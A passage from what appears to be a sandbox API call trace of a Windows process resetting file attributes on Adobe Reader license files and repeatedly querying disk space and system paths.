lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.288] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html", dwFileAttributes=0x80) returned 1 [0108.290] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.290] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.290] CoTaskMemFree (pv=0x506980) [0108.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.291] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.305] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html", dwFileAttributes=0x80) returned 1 [0108.308] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.308] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.308] CoTaskMemFree (pv=0x506980) [0108.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.309] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.318] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html", dwFileAttributes=0x80) returned 1 [0108.321] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.321] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.321] CoTaskMemFree (pv=0x506980) [0108.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.322] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.339] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\license.html", dwFileAttributes=0x80) returned 1 [0108.341] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.341] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.341] CoTaskMemFree (pv=0x506980) [0108.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.342] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.350] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html", dwFileAttributes=0x80) returned 1 [0108.352] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.352] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.352] CoTaskMemFree (pv=0x506980) [0108.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.353] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.366] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\license.html", dwFileAttributes=0x80) returned 1 [0108.368] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.368] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.368] CoTaskMemFree (pv=0x506980) [0108.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.370] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.377] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\license.html", dwFileAttributes=0x80) returned 1 [0108.379] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.379] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.379] CoTaskMemFree (pv=0x506980) [0108.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.380] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.388] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\license.html", dwFileAttributes=0x80) returned 1 [0108.391] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.391] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.391] CoTaskMemFree (pv=0x506980) [0108.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.392] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.416] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\license.html", dwFileAttributes=0x80) returned 1 [0108.420] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.420] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.420] CoTaskMemFree (pv=0x506980) [0108.420] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.428] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\license.html", dwFileAttributes=0x80) returned 1 [0108.431] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.431] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.431] CoTaskMemFree (pv=0x506980) [0108.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.433] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.439] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\license.html", dwFileAttributes=0x80) returned 1 [0108.443] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.443] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.443] CoTaskMemFree (pv=0x506980) [0108.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.443] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.450] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\license.html", dwFileAttributes=0x80) returned 1 [0108.452] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.452] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.452] CoTaskMemFree (pv=0x506980) [0108.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.453] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.460] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html", dwFileAttributes=0x80) returned 1 [0108.462] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.462] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.463] CoTaskMemFree (pv=0x506980) [0108.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.464] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.471] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html", dwFileAttributes=0x80) returned 1 [0108.473] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.473] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.474] CoTaskMemFree (pv=0x506980) [0108.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.474] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.499] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html", dwFileAttributes=0x80) returned 1 [0108.502] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.502] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.503] CoTaskMemFree (pv=0x506980) [0108.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.506] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.506] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.506] CoTaskMemFree (pv=0x506980) [0108.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.512] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.512] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.512] CoTaskMemFree (pv=0x506980) [0108.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.514] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.514] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.514] CoTaskMemFree (pv=0x506980) [0108.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.519] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.519] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.519] CoTaskMemFree (pv=0x506980) [0108.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.521] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.521] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.521] CoTaskMemFree (pv=0x506980) [0108.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.526] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.526] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.526] CoTaskMemFree (pv=0x506980) [0108.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.527] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.528] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.528] CoTaskMemFree (pv=0x506980) [0108.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.533] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.533] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.533] CoTaskMemFree (pv=0x506980) [0108.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.534] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.534] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.535] CoTaskMemFree (pv=0x506980) [0108.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.539] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.539] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.539] CoTaskMemFree (pv=0x506980) [0108.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.540] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.540] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.540] CoTaskMemFree (pv=0x506980) [0108.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.545] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.545] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.545] CoTaskMemFree (pv=0x506980) [0108.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.546] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.547] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.547] CoTaskMemFree (pv=0x506980) [0108.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.552] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.552] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.552] CoTaskMemFree (pv=0x506980) [0108.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.553] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.553] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.553] CoTaskMemFree (pv=0x506980) [0108.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.559] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.559] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.559] CoTaskMemFree (pv=0x506980) [0108.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.560] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.560] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.560] CoTaskMemFree (pv=0x506980) [0108.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.564] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.564] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.565] CoTaskMemFree (pv=0x506980) [0108.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.566] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.566] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.566] CoTaskMemFree (pv=0x506980) [0108.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.571] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.571] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.571] CoTaskMemFree (pv=0x506980) [0108.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.573] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.573] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.573] CoTaskMemFree (pv=0x506980) [0108.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.578] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.578] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.578] CoTaskMemFree (pv=0x506980) [0108.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.580] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.580] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.580] CoTaskMemFree (pv=0x506980) [0108.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.585] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.585] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.585] CoTaskMemFree (pv=0x506980) [0108.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.586] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.586] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.586] CoTaskMemFree (pv=0x506980) [0108.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.591] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.591] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.591] CoTaskMemFree (pv=0x506980) [0108.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.593] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.593] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.593] CoTaskMemFree (pv=0x506980) [0108.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.598] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.598] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.598] CoTaskMemFree (pv=0x506980) [0108.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.599] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.599] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.599] CoTaskMemFree (pv=0x506980) [0108.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.604] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.604] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.604] CoTaskMemFree (pv=0x506980) [0108.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.606] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.606] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.606] CoTaskMemFree (pv=0x506980) [0108.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.621] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.621] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.622] CoTaskMemFree (pv=0x506980) [0108.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", 